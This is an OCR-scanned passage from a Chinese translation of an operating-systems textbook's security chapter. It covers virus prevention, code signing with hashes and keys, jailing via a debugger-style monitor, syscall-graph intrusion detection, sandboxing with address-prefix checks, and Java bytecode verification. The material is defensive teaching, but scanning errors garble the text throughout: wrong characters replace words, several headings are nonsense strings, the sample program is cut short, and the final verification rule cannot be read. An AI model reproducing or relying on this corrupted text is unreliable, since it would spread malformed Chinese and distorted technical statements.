与 其 遗憾 不 如 尽量 安全 。 





避免 病毒 比 起 在 计算 机 感染 后 去 试图 追踪 它们 要 容易 得 多 。 下 面 是 
一 些 个 人 用 户 的 使 用 指南 ， 这 也 是 整个 产业 界 为 减轻 病毒 问题 所 做 的 努 
2 


用 户 该 怎样 做 来 避免 病毒 感染 呢 ? 第 一 ， 选 择 能 提供 高 度 安 全 保障 
的 操作 系统 ， 这 样 的 系统 应 该 拥有 强大 的 核心 -用 户 态 边 界 ， 分 离 提 供 
每 个 用 户 和 系统 管理 员 的 登录 密码 。 在 这 些 条件 下 ， 溜 进来 的 病毒 无 法 
感染 系统 代码 。 


第 二 ， 仅 安装 从 可 徘 的 供应 丙 处 购买 的 最 小 配置 的 软件 。 有 时 ， 即 
使 这 样 也 不 能 保证 有 些 软件 公司 雇员 会 在 商业 软件 产品 里 放置 病毒 ， 但 
这 样 做 会 有 较 大 的 帮助 。 从 Web 站 点 和 公告 板 下 载 软件 是 十 分 冒险 的 行 
为 。 





第 三 ， 购 买 性 能 民 好 的 有 反 病 毒 软件 并 控 指 定 要 求 使 用 。 确 保 能 够 经 
常 从 厂商 站 点 下 载 更 新 版 本 。 








第 四 ， 不 要 点 击 电子 邮件 里 的 附件 ， 告 诉 他 人 不 要 发 送 附 件 给 目 
己 。 使 用 简明 ASCII 文 本 的 邮件 比较 安全 ， 而 附件 在 打开 时 可 能 会 局 动 
病毒 程序 。 


第 五 ， 定 期 将 重要 文件 备份 到 外 部 存储 介质 ， 如 软磁盘 、CD-R 或 
磁带 等 。 在 一 系列 的 备份 介质 中 应 该 保存 不 同 的 版 本 。 这 样 ， 当 发 现 病 
毒 时 就 有 机 会 还 原 被 感染 前 的 文件 。 例 如 ， 假 设 还 原 昨 天 已 被 感染 的 备 
份 版 本 不 成 功 的 话 ， 还 原 上 一 周 的 版 本 也 许 会 有 用 。 








最 后 一 点 ， 抵 抗 住 诱惑 ， 不 要 从 一 个 不 了 解 的 地 方 下 载 并 运行 那些 
吸引 人 的 新 免费 软件 。 或 许 这 些 软件 免费 的 原因 是 : 它 的 制造 者 想 让 你 


的 机 器 加 入 他 的 僵尸 机 豆 的 大 军 中 来 。 然 而 ， 如 果 你 有 虚拟 机 软件 的 
话 ， 在 虚拟 机 中 运行 这 些 不 了 解 的 软件 是 安全 的 。 











整个 业界 应 该 重视 病毒 并 改变 一 些 危 险 的 做 法 。 第 一 ， 制 造 简单 的 


操作 系统 。 铃 声 和 口哨 声 越 多 ， 安 全 漏洞 也 越 多 ， 这 就 是 现实 。 








第 二 ， 不 要 使 用 动态 文本 。 从 安全 角度 来 说 ， 动 态 文 本 是 可 怕 的 。 
浏览 别人 提供 的 文档 时 最 好 不 要 运行 别人 提供 的 程序 。 例 如 ，JPEG 文 
件 就 不 包含 程序 ， 所 以 也 就 不 会 售 有 病毒。 所 有 的 文档 都 应 该 以 这 样 的 
TALIF 














第 三 ， 应 该 采取 措施 将 重要 的 磁盘 柱 面 有 选择 性 地 写 保护 ， 防 止 病 
毒 感染 程序 。 这 种 方法 必须 在 控制 茧 内 部 放置 位 图 说 明 ， 位 图 里 含有 受 
保护 磁盘 柱 面 的 分 布 图 。 只 有 当 用 户 拨 动 了 计算 机 面板 上 的 机 械 拨 动 开 
天后 ， 位 图 才能 够 航 改 动 。 








第 四 ， 使 用 内 存 是 个 好 主意 ， 但 只 有 用 户 拨 动 了 外 部 开关 后 才能 被 
改动 ， 如 当 用 户 有 意识 地 安装 BIOS 升 级 程序 的 时 候 。 当 然 ， 所 有 这 些 
音 施 在 没有 遭受 病毒 的 强烈 攻击 时 ， 是 不 会 引起 重视 的 。 例 如 ， 有 些 病 
毒 会 攻击 金融 领域 ， 把 所 有 银行 账户 的 金额 重 置 为 0。 当 然 ， 那 时 候 再 
采取 措施 就 太 晚 了 。 





9.8.3 ”代码 签名 


一 种 完全 不 同 的 防止 恶意 软件 的 方法 (全 面 防御 ) ， 是 我 们 只 运行 
那些 来 自 可 靠 的 软件 广 商 的 没有 被 修改 过 的 软件 。 马 上 我 们 会 问 ， 用 户 
如 何 知 道 软件 的 确 是 来 自 它 自 己 所 声称 的 厂商 ， 并 且 用 户 又 如 何 知 道 软 
件 从 它 补 生产 之 后 没有 被 修 改过 呢 。 当 我 们 从 一 个 名 声 未 知 的 在 线 商 店 
中 下 载 软件 或 者 从 站 点 下 载 ActiveX 控 件 的 时 候 ， 这 个 问题 就 显得 格外 
重要 。 例 如 ， 如 果 ActiveX 控 件 来 目 一 个 著名 的 软件 公司 ， 那 么 它 几 乎 
不 可 能 包含 一 个 木马 程序 ， 但 是 ， 用 户 如 何 确信 这 一 点 呢 ? 











一 种 被 广泛 应 用 的 解决 办 法 是 数字 签名 ， 这 部 分 内 容 在 9.2.4 市 中 已 
经 讲解 过 。 如 果 用 户 只 运行 那些 由 可 信 的 地 方 制造 并 签名 的 程序 、 插 
件 、 驱 动 、ActiveX 控 件 以 及 其 他 软件 ， 那 么 陷入 麻烦 的 机 会 整 会 少 得 
多 。 但 是 这 样 做 导致 的 后 果 就 是 ， 那 些 来 自 于 Snarky Software 的 新 的 、 
免费 的 、 好 玩 的 、 花 哨 的 游戏 可 能 非常 不 错 但 是 不 会 通过 数字 签名 的 检 
查 ， 因 为 你 不 知道 谁 制造 了 他 们 。 





代码 签名 法 是 基于 公 钥 密码 体系 。 如 某 个 软件 厂商 产生 了 一 对 密 钥 
〈 公 钥 和 私 钥 ) ， 将 公 钥 公开 ， 私 钥 妥 善 保存 。 为 了 完成 对 一 个 软件 签 
名 ， 供 应 商 首先 将 代码 进行 散 列 函数 运算 ， 得 到 128 位 〈 采 用 MD5 算 
法 ) 、160 位 《采用 SHA-1 算 法 ) 或 256 位 《采用 SHA-256 算 法 ) 的 值 。 











然后 通过 私 钥 加 密 取 得 散 列 值 的 数字 签名 (实际 上 ， 在 使 用 时 如 图 9-3 
所 示 进 行 了 解密 ) 。 这 个 数字 釜 名 则 始终 伴随 看 这 个 软件 。 


当 用 户 得 到 这 个 软件 后 ， 计 算出 散 列 函数 并 保存 结果 ， 然 后 将 附带 
的 数字 签名 用 公 钥 进行 解密 。 接 着 ， 核 对 解密 后 的 散 列 函数 值 同 自己 运 
算出 的 值 是 否 相 等 。 如 果 相 等 ， 这 个 软件 就 被 接受 ， 否 则 就 作为 伪造 版 
本 被 拒绝 。 这 里 所 用 到 的 数学 方法 使 得 任何 想 要 算 改 软件 的 人 十 分 难以 
得 手 ， 因 为 这 个 散 列 函数 要 同 从 真正 的 数字 签名 中 解密 出 来 的 散 列 函数 
匹配 。 在 没有 私 钥 的 情况 下 通过 产生 匹配 的 假 数字 签名 是 十 分 困难 的 。 
签名 和 校 验 的 过 程 如 图 9-34 所 示 。 

















软件 供应 商 
软件 供应 商 、，， 
产生 签名 验证 签名 

H1 = hash (Program) 
H2 = decrypt(Signature) 


如 果 H1 =H2, ， 则 接受 程序 


H = hash (Program) 
Signature = encrypt(H) 


图 9-34 代码 签名 的 工作 原理 


网 页 能 够 包含 代码 ， 比 如 AcitiveX 控 件 ， 以 及 各 种 脚本 语言 写 出 的 
代码 。 通 常 这 些 代 码 会 被 签名 ， 而 浏览 器 会 自动 地 检查 这 些 签名 。 当 
然 ， 为 了 验证 签名 ， 浏 览 器 需要 软件 厂商 的 公 钥 ， 它 们 通常 和 代码 在 一 





起 。 和 公 铀 一 起 的 还 有 被 某 个 CA 签名 过 的 证 书 。 如 果 浏 览 器 已 经 保存 
了 这 个 CA 的 公 钥 的 话 ， 它 可 以 自己 验证 这 个 证 书 。 如 果 这 个 证 书 是 被 
浏览 器 所 不 知道 的 茶 个 CA 签名 的 话 ， 那 么 它 会 弹出 一 个 对 话 框 询问 十 
人 否 接 受 这 个 证 书 。 


9.8.4 囚禁 


一 个 古老 的 俄国 谚语 说 :“ 相 信 但 需要 验证 。” 很 明显 地 ， 上 古代 的 俄 
国人 在 类 脑 中 残 已 经 清楚 地 有 了 软件 的 概念 。 即 使 一 个 软件 已 经 被 签名 





了 ， 一 个 好 的 态度 是 去 核实 它 是 否 都 能 正常 运行 。 做 这 件 事情 的 一 种 技 
术 是 囚禁 (ailing) ， 如 图 9-35 所 示 。 





图 9-35 囚禁 的 操作 过 程 


如 图 9-35， 一 个 新 被 接受 的 程序 会 作为 一 个 标 有 “ 因 犯 "的 标签 的 进 
程 来 运行 。 这 个 “ 狱 伯 ”是 一 个 可 信任 的 (系统 的 ) 进程 ， 可 以 监管 内 犯 
进程 的 行为 。 当 一 个 被 监禁 的 进程 作出 一 个 系统 调用 的 时 候 ， 系 统 调用 
不 会 被 执行 ， 而 是 把 控制 移交 给 狱 鞭 进程 〈 通 过 一 个 内 核 陷阱 )》 并 把 系 
统 调用 号 和 参数 传递 给 它 。 这 个 狱 革 进程 会 判断 是 否 这 个 系统 调用 被 多 


许 。 例 如 ， 如 果 倍 监禁 的 进程 试图 和 一 个 狱 举 进程 不 知道 的 远程 主机 建 
立 一 个 网 络 连接 ， 这 个 系统 调用 会 被 拒绝 然后 该 内 犯 进程 被 结束 。 如 果 
这 个 系统 调用 是 可 以 接受 的 ， 那 么 狱 鞭 进程 会 通知 内 核 ， 由 内 核 来 执行 
该 系统 调用 。 通 过 使 用 这 种 方法 ， 不 正确 的 行为 会 在 它 引 起 腑 烦 之 前 被 
捕捉 到 。 











办 禁 有 很 多 的 实现 方法 。 有 一 种 方法 可 以 在 不 需要 修改 内 核 的 情况 
下 ， 在 几乎 任何 一 个 UNIX 系 统 上 实现 ， 这 种 方法 是 Vant Noordende 等 
人 在 2007 年 提出 的 。 在 nutshell 中 ， 这 个 方法 使 用 普通 的 UNIX 调 试 功 
能 ， 让 狱 鞭 进程 作为 调试 者 而 囚犯 进程 作为 被 调试 者 。 这 种 情况 下 ， 调 
试 者 可 以 指示 内 核 把 被 调试 者 封装 起 来 ， 然 后 把 被 调试 者 的 所 有 系统 调 
用 都 传递 给 自己 来 监视 。 


9.8.5 “基于 模型 鸭 入 侵 检 测 


还 有 一 种 方法 可 以 保护 我 们 的 机 器 ， 那 就 是 安装 一 个 

IDS (Intrusion Detection System) 。IDS 有 两 种 基本 的 类 型 ， 一 种 关注 于 
监测 进入 电脑 的 网 络 包 ， 另 一 种 关注 寻找 CPU 上 的 异常 情况 。 之 前 在 防 
火 墙 的 部 分 我 们 简要 地 提 到 了 网 络 IDS; 现在 我 们 对 于 基于 主机 的 IDS 
进行 一 些 讲 解 。 出 于 篇 幅 限 制 ， 我 们 不 能 够 审视 全 部 的 种 类 繁多 的 基于 
主机 的 IDS。 相 反 地 ， 我 们 选择 一 种 类 型 来 简单 地 了 解 它们 是 如 何 工 作 
的 。 这 种 类 型 是 基于 静态 模型 的 入 侵 检 测 Cwagner#llDean, 2001) 。 它 
可 以 用 上 面 提 到 的 囚禁 技术 来 实现 ， 同 时 也 有 其 他 的 实现 方法 。 





在 图 9-36a 中 我 们 看 到 了 这 样 一 个 小 程序 ， 它 打开 一 个 叫 data 的 文 
件 ， 然 后 每 次 一 个 字符 地 读 入 ， 直 到 直到 了 一 个 0 字 市 ， 这 时 打印 出 文 
件 开 始 部 分 的 非 0 字 节 的 个 数 然后 程序 退出 。 在 图 9-36b 中 ， 我 们 看 到 了 
这 个 程序 的 系统 调用 图 〈 这 里 打印 被 叫做 write) 。 





int main(int argc *char argv[]) 


{ 
int fd, n = 0; 
char buf[1]; 


fd = open("data", 0); 
if (fd < 0) { 
printf("Bad data file\n"); 
exit(1); 
} else { 
while (1) { 
read(fd, buf, 1); 
if (buf[0] == 0) { 
close(fd); 
printf("n = %d\n", n); 
exit(0); 
} 


n=n+1; 





图 9-36 ast; b) 该 程序 的 系统 调用 图 








这 个 图 告诉 了 我 们 什么 呢 ? 首先 ， 在 任何 情况 下 ， 这 个 程序 的 第 一 


个 系统 调用 一 定 是 open。 第 二 个 系统 调用 是 read 或 者 write， 这 要 根据 执 


行 让 语句 的 那个 分 文 来 决定 。 如 宁 第 二 个 系统 调用 是 write， 那 么 岗 意 味 
着 文件 无 法 打开 ， 然 后 下 一 个 系统 调用 必须 是 exit。 如 果 第 二 个 系统 调 
用 是 read， 那 么 可 能 还 有 额外 任意 多 次 的 read 调 用 ， 并 且 最 后 调用 


close、write 和 exit。 在 没有 入 侵 的 情况 下 ， 其 他 序列 是 不 可 能 的 。 如 果 


这 个 程序 被 因 茶 ， 那 么 狱 共 程序 可 以 看 到 所 有 的 系统 调用 并 很 容易 地 验 
证 某 个 序列 是 不 是 有 效 的 。 











现在 假设 订 人 发 现 了 这 个 程序 的 一 个 bug， 然 后 成 功 地 引起 了 缓冲 
区 溢 出 ， 插 入 并 执行 了 恶意 代码 。 当 恶意 代码 运行 的 时 候 ， 极 大 的 可 能 
是 会 执行 一 个 不 同 的 系统 调用 序列 。 例 如 ， 恶 意 代 码 可 能 尝试 打开 某 个 
它 想 要 复制 的 文件 或 者 可 能 和 家 里 的 电话 建立 网 络 连接 。 当 第 一 次 出 现 
系统 调用 不 符合 原来 的 模式 时 ， 狱 革 十 分 肯定 地 认定 出 现 了 攻击 并 会 采 
取 行 动 ， 比 如 结束 这 个 进程 并 同系 统管 理 员 报 和 警 。 这 样 ， 入 侵 检测 系统 
就 能 够 在 攻击 发 生 的 时 候 检查 到 它们 。 表 态 系统 调用 分 析 只 是 很 多 IDS 
工作 方法 中 的 一 种 。 








当 使 用 这 种 基于 静态 模型 的 入 侵 检测 的 时 候 ， 狱 竺 必须 知道 这 个 模 
型 “比如 系统 调用 图 ) 。 最 直接 的 方式 束 是 让 编译 占 产 生 它 并 让 程序 的 
作者 签名 同时 附 上 它 的 证 书 。 这 样 的 话 ， 任 何 预 完 修改 可 执行 程序 的 企 
图 都 会 被 在 程序 运行 的 时 候 检测 到 ， 因 为 实际 的 行为 和 被 签 过 名 的 预期 
行为 不 一 致 ， 











很 不 幸 的 是 ， 一 个 聪明 的 攻击 者 可 能 发 动 一 种 叫做 模仿 攻击 
(mimicry attack) 的 攻击 ， 在 这 种 攻击 中 插入 的 代码 会 有 和 该 程序 同样 
的 系统 调用 序列 〈Wagner 和 Soto，2002) ， 所 以 我 们 需要 更 复杂 的 模 
型 ， 不 能 仅仅 依靠 跟踪 系统 调用 。 然 而 ， 作 为 深层 防御 的 一 部 分 ，IDS 
还 是 扮演 着 重要 的 角色 。 


无 论 如 何 ， 基 于 模型 的 IDS 不 仅仅 是 以 一 种 。 许 多 IDS 利 用 了 一 个 
叫做 蜜 色 Choneypot) 的 概念 ， 这 是 一 个 吸引 和 捕捉 攻击 者 和 恶意 软件 
的 陷阱 。 通 常 蜜 铅 会 是 一 个 孤立 的 机 器 ， 几 乎 没有 防御 ， 表 面 看 起 来 令 
人 感 兴趣 并 且 有 些 有 价值 的 内 容 ， 像 一 个 成 熟 等 待 采 摘 的 果实 一 样 。 设 
置 蜜 缸 的 人 会 小 心 翼 翼 地 监视 它 上 面 的 任何 攻击 并 尽量 去 了 解 攻击 的 特 
征 。 一 些 IDS 会 把 蜜 饶 放 在 虚拟 机 上 防止 对 下 层 实际 系统 的 破坏 。 所 以 
很 自然 地 ， 恶 意 软件 也 会 像 之 前 提 到 的 努力 地 检查 自己 是 否 运 行 在 一 个 
虚拟 机 上 。 























9.8.6 ARMAS 


病毒 和 蠕虫 不 需要 制造 者 有 多 大 学 问 ， 而 且 往往 会 与 用 户 意 愿 相 反 
地 侵入 到 计算 机 中 。 但 有 时 人 们 也 会 不 经 意 地 在 目 己 的 机 器 上 放 入 并 执 
行 外 来 代码 。 情 况 通 第 是 这 样 友 生 的 : 在 遥远 的 过 去 《在 Internet 世 界 
里 ， 代 表 去 年 ) ， 大 多 数 网 页 是 含有 少量 相关 图 片 的 静态 文件 ， 而 现在 
越 来 越 多 的 网 页 包含 了 叫做 Applet 的 小 程序 。 当 人 们 下 载 包含 Applet 的 
网 页 时 ，Applet 就 会 被 调用 并 运行 。 例 如 ， 某 个 Applet 也 许 包 含 了 需要 
填充 的 表格 以 及 交互 式 的 帮助 信息 。 当 表格 填 好 后 会 被 送 到 网 上 的 某 处 
进行 处 理 。 税 单 、 客 户 产 品 定单 以 及 许多 种 类 的 表格 都 可 以 使 用 这 种 方 
VE 














为 一 个 让 程序 从 一 台 计 算 机 到 男 一 台 计 算 机 上 运行 的 例子 是 代理 程 
序 (agent) 。 代 理 程序 指 用 户 让 程序 在 目标 计算 机 上 执行 任务 后 再 返回 
报告 。 例 如 ， 要 求 芭 个 代理 程序 查看 旅游 网 站 ， 碍 找 从 阿姆斯特丹 到 有 旧 
金山 的 最 便宜 航线 。 代 理 程序 会 登录 到 每 个 站 点 上 运行 ， 找 到 所 需 的 信 
恩 后 ， 再 前 进 到 下 一 个 站 点。 当 所 有 的 站 点 查询 完毕 后 ， 它 返回 原 处 并 
报告 结 


第 三 个 移动 代码 的 例子 是 PostScript 文 件 中 的 移动 代码 ， 这 个 文件 将 
在 PostScript 打 印 机 上 打印 出 来 。 一 个 PostScript 文 件 实际 上 是 用 


PostScript 语 言 编写 ， 它 可 在 打印 机 里 执行 的 程序 。 它 通常 告诉 打印 机 如 
何 画 某 些 特定 的 曲线 并 加 以 填充 ， 它 也 可 以 做 其 他 任何 想 做 的 事 。 
Applet、 代 理 和 PostScript 是 移动 代码 (mobile code) 的 三 个 例子 ， 当 然 
还 有 许多 其 他 的 例子 。 


在 前 面 大 篇 幅 讨 论 了 病毒 和 蠕虫 之 后 ， 我 们 很 清楚 地 意识 到 让 外 来 
代码 运行 在 目 己 的 计算 机 上 多 少 有 点 冒险 。 然 而 ， 有 些 人 的 确 想 要 运行 
外 来 代码 ， 所 以 就 会 产生 问题 : “移动 代码 可 以 安全 运行 吗 ? ” 简 而 言 
之 : 可 以 ， 但 并 不 容易 。 最 基本 的 问题 在 于 当 进 程 把 Applet 或 其 他 的 移 
动 代码 插入 地 址 空间 并 运行 后 ， 这 些 代 码 就 成 了 合法 的 用 户 进 程 的 一 部 
分 ， 并 且 掌 握 了 用 户 所 拥有 的 权限 ， 包 括 对 用 户 的 磁 副 文件 进行 读 、 
写 、 删 除 或 加 密 ， 把 数据 用 E-mail 发 送 到 其 他 国家 等 。 














很 和 以前， 操作 系统 推出 了 进程 的 概念 ， 为 的 是 在 用 户 之 间 建 立 隔 
离 增 。 在 这 一 概念 中 ， 每 个 进程 都 有 上 自己 的 保护 地 址 空间 和 UID， 人 允许 
获取 自己 的 文件 和 资源 ， 而 不 能 获取 他 人 的 。 而 对 于 保护 进程 的 一 部 分 
( 指 Applet) 或 者 其 他 资源 来 说 ， 进 程 概念 也 无 能 为 力 。 线 程 允许 在 一 
个 进程 中 控制 多 个 线程 ， 但 是 单个 线程 与 其 他 线程 之 间 却 没有 提供 保 
va 





从 理论 上 来 说 ， 将 每 个 Applet 作 为 独立 的 进程 运行 只 能 帮 上 一 点 
忙 ， 但 缺乏 可 操作 性 。 例 如 ， 某 个 Web 网 页 包含 了 相互 之 间 互 相 影响 的 
两 个 或 多 个 Applet， 而 数据 在 Web 页 里 。Web 浏 览 器 也 需要 与 Applet 交 








互 ， 启 动 或 停止 它们 ， 为 它们 输入 数据 等 。 如 果 每 个 Applet 被 放 在 自己 
的 进程 里 ， 就 无 法 进行 任何 操作 。 而 且 ， 把 每 个 Applet 放 在 自己 的 地 址 
空间 里 并 不 能 保证 Applet 不 禄 取 或 损害 数据 。 如 果 有 Applet 想 这 样 做 是 
很 容易 的 ， 因 为 没有 人 在 一 旁 监 视 。 








和 人们 还 使 用 了 许多 新 方法 来 对 付 Applet (通常 是 移动 代码 ) 。 下 面 
我 们 将 看 看 其 中 的 两 种 方法 : 沙 合法 和 解释 法 。 男 外 ， 代 码 签名 同样 能 
够 用 于 验证 Applet 代 码 。 每 一 种 方法 都 有 自己 的 长 处 和 短处 。 


第 一 种 方法 叫做 沙 盒 法 (sandboxing) ， 这 种 方法 将 每 个 运行 的 
Applet 限 制 在 一 定 范围 的 有 效 地 址 中 (Wahbe 等 人 ,1993) 。 它 的 工作 原 
理 是 把 虚拟 地 址 空间 划分 为 相同 大 小 的 区 域 ， 每 个 区 域 叫 做 沙 盒 。 每 个 
沙 盒 必 须 保证 所 有 的 地 址 共享 高 位 字 节 。 对 32 位 的 地 址 来 说 ， 我 们 可 以 
把 它 划分 为 256 个 沙 盒 ， 每 个 沙 盒 有 16MB 空 间 并 共享 相同 的 高 8 位 。 同 
样 ， 我 们 也 可 以 划分 为 512 个 8MB 空 间 的 沙 盒 ， 每 个 沙 盒 共 享 9 位 地 址 前 
组 。 沙 盒 的 尺寸 可 以 选取 到 足够 容纳 最 大 的 Applet 而 不 浪费 太 多 的 地 址 
空间 。 如 果 页 面 调用 满足 的 话 ， 物 理 内 存 不 会 成 为 问题 。 每 个 Applet 拥 
有 两 个 沙 会， 一 个 放置 代码 ， 另 一 个 放置 数据 ， 如 图 9-37a 所 示 的 16 个 
16MB 的 沙 盒 。 
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图 9-37 习 内 存 被 划分 为 16 MBM; b) 检 查 指令 有 效 性 的 一 种 方 
法 


沙 盒 的 用 意 在 于 保证 每 个 Applet 不 能 跳 转 到 或 引用 其 他 的 代码 沙 盒 
或 数据 沙 盒 。 提 供 两 个 沙 盒 的 目的 是 为 了 避免 Applet 在 运行 时 超越 限制 
修改 代码 。 通 过 抑制 把 所 有 的 Applet 放 入 代码 沙 盒 ， 我 们 减少 了 自我 修 
改 代码 的 危险 。 只 要 Applet 通 过 这 种 方法 受到 限制 ， 它 就 不 能 损害 浏览 
铝 或 其 他 的 Applet， 也 不 能 在 内 存 里 培植 病毒 或 者 对 内 存 造 成 损失 。 














只 要 Applet 被 装 入 ， 它 就 被 重新 分 配 到 沙 盒 的 开头 ， 然 后 系统 检查 





代码 和 数据 的 引用 是 否 已 被 限制 在 相应 的 沙 盒 里 。 在 下 面 的 讨论 中 ， 我 
们 将 看 一 下 代码 引用 (如 JMP 和 CALL 指 令 ) ， 数 据 引 用 也 是 如 此 。 使 
用 直接 寻 址 的 静态 JMP 指 令 很 容易 检查 : 目标 地 址 是 否 仍旧 在 代码 沙 盒 
里 ?同样 ， 相 对 JMP 指 令 也 很 容易 检查 。 如 果 Applet 含 有 要 试图 离开 代 
码 沙 盒 的 代码 ， 它 就 会 被 拒绝 并 不 予 执行 。 同 样 ， 试 图 接触 外 界 数据 的 
Applet 也 会 被 拒绝 。 








最 困难 的 是 动态 JMP。 大 多 数 计算 机 都 有 这 样 一 条 指令 ， 该 指令 中 
要 跳 转 的 目标 地 址 在 运行 的 时 候 计 算 ， 该 地 址 被 存 入 一 寄存 器 ， 然 后 间 
接 跳 转 。 例 如 ， 通 过 JMP (R1) 跳 转 到 寄存 器 1 里 存放 的 地 址 。 这 种 指 
令 的 有 效 性 必须 在 运行 时 检查 。 检 查 时 ， 系 统 直接 在 间接 跳 转 之 前 插入 
代码 ， 以 便 测试 目标 地 址 。 这 样 测试 的 一 个 例子 如 图 9-37b 所 示 。 请 记 
住 ， 所 有 的 有 效 地 址 都 有 同样 的 高 k 位 地 址 ， 所 以 该 地 址 前 级 被 存放 在 
临时 寄存 器 里 ， 如 说 S2。 这 样 的 寄存 器 不 能 被 Applet 自 喘 使 用 ， 因 为 
Applet 有 可 能 要 求 重 写 寄存 器 以 避免 受 该 寄存 器 限制 。 


有 关 代 码 是 按 如 下 工作 的 : 首先 把 被 检查 的 目标 地 址 复制 到 临时 寄 
存 器 S1 中 。 然 后 该 寄存 器 向 右 移 位 正好 将 S1 中 的 地 址 前 绥 隔 离 出 来 。 第 
二 步 将 隔离 出 的 前 级 同 原先 装 入 S2 寄 存 器 里 的 正确 前 级 进行 比较 。 如 果 
不 匹配 就 激活 陷阱 程序 杀 死 进程 。 这 上段 代码 序列 需要 四 条 指令 和 两 个 临 
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对 运行 中 的 二 进 制 程序 打 补 丁 需要 一 些 工 作 ， 但 却 是 可 行 的 。 如 采 








Applet 是 以 源 代 码 形 式 出 现 ， 工 作 就 容易 得 多 。 随 后 在 本 地 的 编译 器 对 
Applet 进 行 编 译 ， 自 动 查 看 静态 地 址 并 插入 代码 来 校 验 运 行 中 的 动态 地 
址 。 同 样 也 需要 一 些 运行 时 间 的 开销 以 便 进行 动态 校 验 。Wahbe 等 人 
(1993) 估计 这 方面 的 时 间 大 约 占 4%， 这 一 般 是 可 接受 的 。 


另 一 个 要 解决 的 问题 是 当 Applet 试 图 进行 系统 调用 时 会 发 生 什么 ? 
解决 方法 是 很 直接 的 。 系 统 调用 的 指令 被 一 个 叫做 基准 监视 器 的 特殊 模 
块 所 蔡 代 ， 这 一 模块 采用 了 与 动态 地 址 校 验 相 同 的 检查 方式 〈 或 者 ， 如 
末 有 源 代 码 ， 可 以 链接 一 个 调用 基准 监视 器 的 库 文 件 ， 而 不 是 执行 系统 
WH) 。 在 这 两 个 方法 中 ， 基 准 监视 器 检查 每 一 个 调用 企图 ， 并 决定 该 
调用 是 否 可 以 安全 执行 。 如 果 认 为 该 调用 是 可 接受 的 ， 如 在 指定 的 暂 存 
目录 中 写 临时 文件 ， 这 种 调用 残 可 以 执行 。 如 果 调 用 被 认为 是 危险 的 或 
者 基准 监视 器 无 法 判断 ，Applet 束 被 终止 。 大 基准 监视 右 可 以 判断 是 哪 
一 个 Applet 执 行 的 调用 ， 内 存 里 的 一 个 基准 监视 器 就 能 处 理 所 有 这 样 
Applet 的 请 求 。 基 准 监 视 需 通常 从 配置 文件 中 获知 是 否 允 许 执行 。 








2. 解 释 


第 二 种 运行 不 安全 Applet 的 方法 是 解释 运行 并 阻止 它们 获得 对 硬件 
的 控制 。Web 浏 览 器 使 用 的 就 是 这 种 方法 。 网 页 上 的 Applet 通 常 是 用 
Java 写 的 ，Java 可 以 是 一 种 普通 的 编程 语言 ， 也 可 以 是 高 级 脚本 语言 ， 
如 安全 TCL 语 言 或 Javascript。Java Applet 首 先 被 编译 成 一 种 叫做 
JVM (Java 虚 拟 机 ，Java Virtual Machine〉 的 面向 栈 的 机 器 语言 。 正 是 


这 些 JVM Applet 被 放 在 网 页 上 ， 当 它们 被 下 载 时 就 插入 到 浏览 器 内 置 的 
JVM 解 释 器 中 ， 如 图 9-38 所 示 。 


虚拟 地 址 空间 


OxFFFFFFFF 





不 可 信 
Applet | 

ih 可 信 
ERE AS Applet ` 


Web 浏 览 器 


图 9-38 Applet 可 以 被 Web 浏 览 器 以 解释 方式 执行 


使 用 解释 运行 的 代码 比 编译 运行 的 代码 好 处 在 于 ， 每 一 条 指令 在 执 
行 前 都 由 解释 器 进行 检查 。 这 就 给 了 解释 器 识别 校 验 地 址 是 否 有 效 的 机 
会 。 妇 外 ， 系 统 调用 也 可 以 被 捕捉 并 解释 。 这 些 调 用 的 处 理 方式 与 安全 
策略 有 关 。 例 如 ， 如 果 Applet 是 可 信任 的 《如 来 目 本 地 磁盘 的 
Applet) ， 它 的 系统 调用 束 可 以 又 无 疑问 会 被 执行 。 但 是 如 果 Applet 不 
受信 任 《〈《 如 来 自 Internet 的 Applet) ， 它 就 会 被 放 入 沙 盒 来 限制 自身 的 行 
为 。 











高 级 脚本 语言 也 能 够 被 解释 执行 。 这 里 ， 解 释 执行 不 需要 机 需 地 


址 ， 所 以 也 就 不 存在 脚本 以 不 允许 的 方式 访问 内 存 所 带 来 的 危险 。 解 释 
运行 的 缺点 是 : 它 与 编译 运行 的 代码 相 比 十 分 缓慢 。 





9.8.7 Java 安全 性 


人 们 设计 了 Java 编 程 语言 和 相关 的 运行 时 系统 ， 是 为 了 一 次 编写 并 
编译 后 束 能 够 在 Interent 上 以 二 进 制 代码 的 形式 运行 在 所 有 文 持 Java 的 机 
器 上 。 从 一 开始 设计 Java 语 言 开始 ， 安 全 性 就 成 为 其 重要 的 一 部 分 。 在 
这 一 小 节 ， 我 们 来 看 看 它 的 工作 原理 。 





Java 是 一 种 在 类 型 上 安全 的 编程 语言 ， 也 就 是 说 编译 器 会 拒绝 任何 
与 自身 类 型 不 一 致 的 变量 使 用 。 而 C 语 言 正 好 相反 ， 请 看 下 面 的 代码 : 








naughty func() 
{ 


char *p; 
p=rand(); 
*p=0; 

} 








代码 把 产生 的 随机 数 放 在 指针 p 中 。 然 后 把 0 字 市 存储 在 p 所 包含 的 
地 址 中 ， 禾 盖 了 地 址 里 原先 的 任何 代码 和 数据 。 而 在 Java 中 ， 混 合 使 用 
类 型 的 语句 是 被 语法 所 禁止 的 。 而 且 ，Java 没 有 指针 变量 、 类 型 转换 、 
用 户 控制 的 存储 单元 分 配 ( 如 malloc 和 free》， 并 且 所 有 的 数组 引用 都 


要 在 运行 时 进行 校 验 。 


Java 程 序 被 编译 成 一 种 叫做 JVM (Java Virtual Machine) 字 节 人 码 的 
中 间 形 态 二 进 制 代码 。JVM 有 大 约 100 个 指令 ， 大 多 数 指 令 是 把 不 同类 


型 的 对 象 压 入 栈 、 弹 出 栈 或 是 用 算术 合并 栈 里 的 对 象 。 这 些 JVM 程 序 通 
常 是 解释 执行 程序 ， 虽 然 在 某 些 情况 下 它们 可 以 被 编译 成 机 器 语言 以 便 
执行 得 更 快 。 在 Java 模 式 中 ， 通 过 Internet 发 送 到 远程 计算 机 上 运行 的 
Applet 是 JVM 程 序 。 








当 Applet 到 达 远 程 计 算 机 时 ， 痛 先 由 JVM 字 市 码 校 验 器 查看 Applet 
是 否 符合 规则 。 正 确 编译 的 Applet 会 目 动 符合 规则 ， 但 无 法 阻止 一 个 恶 
意 的 用 户 用 汇编 语言 写 JVM 格 式 的 Applet。 校 验 的 规则 包括 : 





1)Applet 有 是否 伪 造 了 指针 ? 

2) 古 否 违背 了 私有 类 成 员 的 访问 限制 ? 

3) 是 否 试 图 把 某 种 类 型 的 变量 用 作 其 他 类 型 ? 
AER EREHE Piit? 

